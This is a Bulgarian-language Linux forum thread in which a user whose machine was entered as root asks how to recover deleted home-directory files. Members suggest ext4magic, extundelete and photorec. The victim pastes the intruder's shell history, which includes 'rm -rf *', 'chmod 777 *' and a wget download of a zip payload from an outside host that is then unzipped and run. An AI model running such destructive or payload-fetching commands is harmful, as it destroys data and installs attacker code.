Автор Тема: Възстановяване на файлове  (Прочетена 631 пъти)

4096bits

  • Участник
  • *****
  • Публикации: 1984
    • Профил
Възстановяване на файлове
« -: Дек 07, 2017, 14:43 »
Привет!
Снощи по някое време, някой с root потребителя е влязъл в системата ми и е изтрил всички файлове в домашната директория на моя си потребител. Моя грешка, но след инсталация на системата не съм променил паролата за root. Сега, въпросът ми е, с кой инструмент да пробвам да възстановя файловете. Изтрито е всичко, с изключение на скритите файлове и папки? С имената. Чувал съм за testdisk, photorec, но нещо чета, че имената били просто цифри и букви.

И да се занимавам ли да търся някакво съдействие от полиция или не си струва просто, защото сигнал пуснах през някакъв портал, но имам малко съмнения относно, ще стигне ли някъде.
Активен

"As they say in Mexico 'dosvidaniya'. That makes two vidaniyas."

makeme

  • Участник
  • *****
  • Публикации: 217
  • Distribution: Many
  • Window Manager: Mate
    • Профил
Re: Възстановяване на файлове
« Отговор #1 -: Дек 07, 2017, 15:23 »
Съжалявам, колега, за това, което ти се е случило. Ако използваш ext3/4 може да погледнеш extundelete. photorec е много добър, но правилно си прочел за имената. Лично аз не съм го пробвал това extundelete, но съм му хвърлил око и ще се радвам да дадеш фийдбек. Успех!
« Последна редакция: Дек 07, 2017, 15:30 от makeme »
Активен

Distributions:  UbuntuMate 14.04; 15.10; 16.04, CentOS 6.x, 7.x, Kali 2.0 ...

remotexx

  • Участник
  • *****
  • Публикации: 421
    • Профил
Re: Възстановяване на файлове
« Отговор #2 -: Дек 07, 2017, 16:54 »
Колега, а в кошчето погледна ли?

Тоа "хакер" ще да е бил бая невръстен май.. да търка от графичен инструмент файловете - защото мисля знаеш че под конзола (па даже и през конзолен инструментъ а-ла mc) такова нещо като скрити файлове няма (предполагам имаш предвид тия с дето имената почват с точка)  :P

та... ако не ги е тръкнал с натиснат Шифт (т.е. перманентно) верятно са в коша - е поне пъвите няколко ГБ т.е. според там колкото ти е зададен лимит на коша...

инак хората вече ти предложиха инструмент(и) за възстановяване (и не може като под една друга ОС да се възстановят имената, щото там се трие само първия символ и при възстановяване лесно се сещаш) и имай предвид че възстановявнето работи само ако не си презаписал нещо отгоре т.е. обик. диска се сваля (офлайн) и се прави копие преди да се предприеме каквото и да е (защото обикновен твърд диск не е флашка дето оптимизира износването на хардуера и винаги пише първо по останалите 'неизползвани' сектори преди да се върне пак на току що изтритите)
« Последна редакция: Дек 07, 2017, 16:59 от remotexx »
Активен

console

  • Участник
  • *****
  • Публикации: 188
    • Профил
    • WWW
Re: Възстановяване на файлове
« Отговор #3 -: Дек 07, 2017, 16:57 »
Абе я дай да го видиме тоя хубавец. Как се е хакнал в системата през ssh или ?

Кажи с каква дистрибуция си да изместиме МВР от сцената  ;D
Активен

“Ever tried. Ever failed. No matter. Try again. Fail again. Fail Better.”

makeme

  • Участник
  • *****
  • Публикации: 217
  • Distribution: Many
  • Window Manager: Mate
    • Профил
Re: Възстановяване на файлове
« Отговор #4 -: Дек 07, 2017, 17:21 »
Тоа "хакер" ще да е бил бая невръстен май.. да търка от графичен инструмент файловете - защото мисля знаеш че под конзола (па даже и през конзолен инструментъ а-ла mc) такова нещо като скрити файлове няма (предполагам имаш предвид тия с дето имената почват с точка)  :P

та... ако не ги е тръкнал с натиснат Шифт (т.е. перманентно) верятно са в коша - е поне пъвите няколко ГБ т.е. според там колкото ти е зададен лимит на коша...

Може да е ползвал "rm -rf *" . Ефектът е същия. :)

@4096bits, гледам, че инструмента, който ти предложих са го форкнали. ext4magic се казва новия. Може би е по-добре с него да опиташ, но пак казвам те са само за EXT* файлови системи.
Активен

Distributions:  UbuntuMate 14.04; 15.10; 16.04, CentOS 6.x, 7.x, Kali 2.0 ...

4096bits

  • Участник
  • *****
  • Публикации: 1984
    • Профил
Re: Възстановяване на файлове
« Отговор #5 -: Дек 07, 2017, 17:47 »
Точно с rm -rf * е свършил работата. Запазих history-то.
Код:
ls /
history
cd
ls -a
ls -s
install -o vsftpd
install --help
install vsftpd
apt-get
pkg
yum
ifconfig
cat /proc/cpuinfo
ls
cat /etc/issue
rm -rf *
cd victor
uptime
cd /home
cd
./go 32
chmod 777 *
cd groot
unzip groot
wget nasapaul.16mb.com/groot.zip
Забавното е, че пробва там наличните мениджъри на пакети и като вижда, че не става и е до там. :D

Във /var/log/auth.log не видях нещо нередно, но може и да не зная, за какво да гледам. Иначе машината ми е вързана с моя рутер безжично, а той пък за суича или рутера на доставчика. Помислих си да си вържа директно лапито за кабела на доставчика и да сканирам мрежата обаче ме домързя, а и тоз ме е налазил към полунощ. Та може да изчакам до тогава.

Смея се, но не ми е смешно. Имаше важни неща в една от папките. Останалото... дреме ми шаапката за него. Ще пробвам инструментите, които предложихте, като се преборя със страха от евентуално разочарование. Системата е Arch. В момента пиша от Убунту МАТЕ
« Последна редакция: Дек 07, 2017, 17:49 от 4096bits »
Активен

"As they say in Mexico 'dosvidaniya'. That makes two vidaniyas."

makeme

  • Участник
  • *****
  • Публикации: 217
  • Distribution: Many
  • Window Manager: Mate
    • Профил
Re: Възстановяване на файлове
« Отговор #6 -: Дек 07, 2017, 17:52 »
Един страничен въпрос: Порта 22 ли си ти беше, или си го сменял ?
Активен

Distributions:  UbuntuMate 14.04; 15.10; 16.04, CentOS 6.x, 7.x, Kali 2.0 ...

4096bits

  • Участник
  • *****
  • Публикации: 1984
    • Профил
Re: Възстановяване на файлове
« Отговор #7 -: Дек 07, 2017, 17:56 »
Нищо не съм сменял
Активен

"As they say in Mexico 'dosvidaniya'. That makes two vidaniyas."

makeme

  • Участник
  • *****
  • Публикации: 217
  • Distribution: Many
  • Window Manager: Mate
    • Профил
Re: Възстановяване на файлове
« Отговор #8 -: Дек 07, 2017, 19:51 »
Ето ти малък гайд за това новото. Пробвах го, работи, но както колегата по-горе каза: Може и да има презаписани файлове.

1. Демонтираш дяла/дяловете.
2.
Цитат
ext4magic /dev/sdb1 -s 4096 -J -f /home/ | grep “Inode:”

/dev/sdb1 - Това ти е партишъна
4096 - Това ти е големината на блока (трябва да я провериш предварително)
/home/ - Предполагам това искаш да възстановяваш
grep-а може и да го махнеш  и да видиш кой инод номер ти върши най-голяма работа

3.
Цитат
ext4magic /dev/sdb1 -s 4096 -R -I 1572865 -d RECOVERED_FILES/

1572865 - примерен инод номер
RECOVERED_FILES - Директорията в която ще ти възстанови файловете.

Надявам се да стане и при теб :)
« Последна редакция: Дек 07, 2017, 20:17 от makeme »
Активен

Distributions:  UbuntuMate 14.04; 15.10; 16.04, CentOS 6.x, 7.x, Kali 2.0 ...

4096bits

  • Участник
  • *****
  • Публикации: 1984
    • Профил
Re: Възстановяване на файлове
« Отговор #9 -: Дек 08, 2017, 12:42 »
Изписва ми грешка:
/dev/sda1 Error 13 while opening filesystem

Или:
Error 2 while opening filesystem
"RECOVERDIR"  accept for recoverdir
ext4magic : EXIT_SUCCESS

Файловата система е ехт4, дяла не е монтиран...
Активен

"As they say in Mexico 'dosvidaniya'. That makes two vidaniyas."

makeme

  • Участник
  • *****
  • Публикации: 217
  • Distribution: Many
  • Window Manager: Mate
    • Профил
Re: Възстановяване на файлове
« Отговор #10 -: Дек 08, 2017, 13:18 »
Лоша работа. Това означава, че файловата система е corrupted и в такъв случай, ще трябва да ползваш photorec или подобните. Смисъл няма да можеш да възстановиш имената. Ако има някой по-запознат, нека се изкаже и той, но аз така мисля.
Активен

Distributions:  UbuntuMate 14.04; 15.10; 16.04, CentOS 6.x, 7.x, Kali 2.0 ...

4096bits

  • Участник
  • *****
  • Публикации: 1984
    • Профил
Re: Възстановяване на файлове
« Отговор #11 -: Дек 08, 2017, 17:14 »
Не зная, как файловата система е счупена, след като системата си работи съвсем нормално без никакви засечки.
В крайна сметка може и photorec  да използвам. Трябват ми само три вида файлове, а имената ще мога да ги възстановя на ръка като погледна съдържанието. Или пък някак ще го автоматизирам и това, ако са прекалено много.

Благодаря!
Активен

"As they say in Mexico 'dosvidaniya'. That makes two vidaniyas."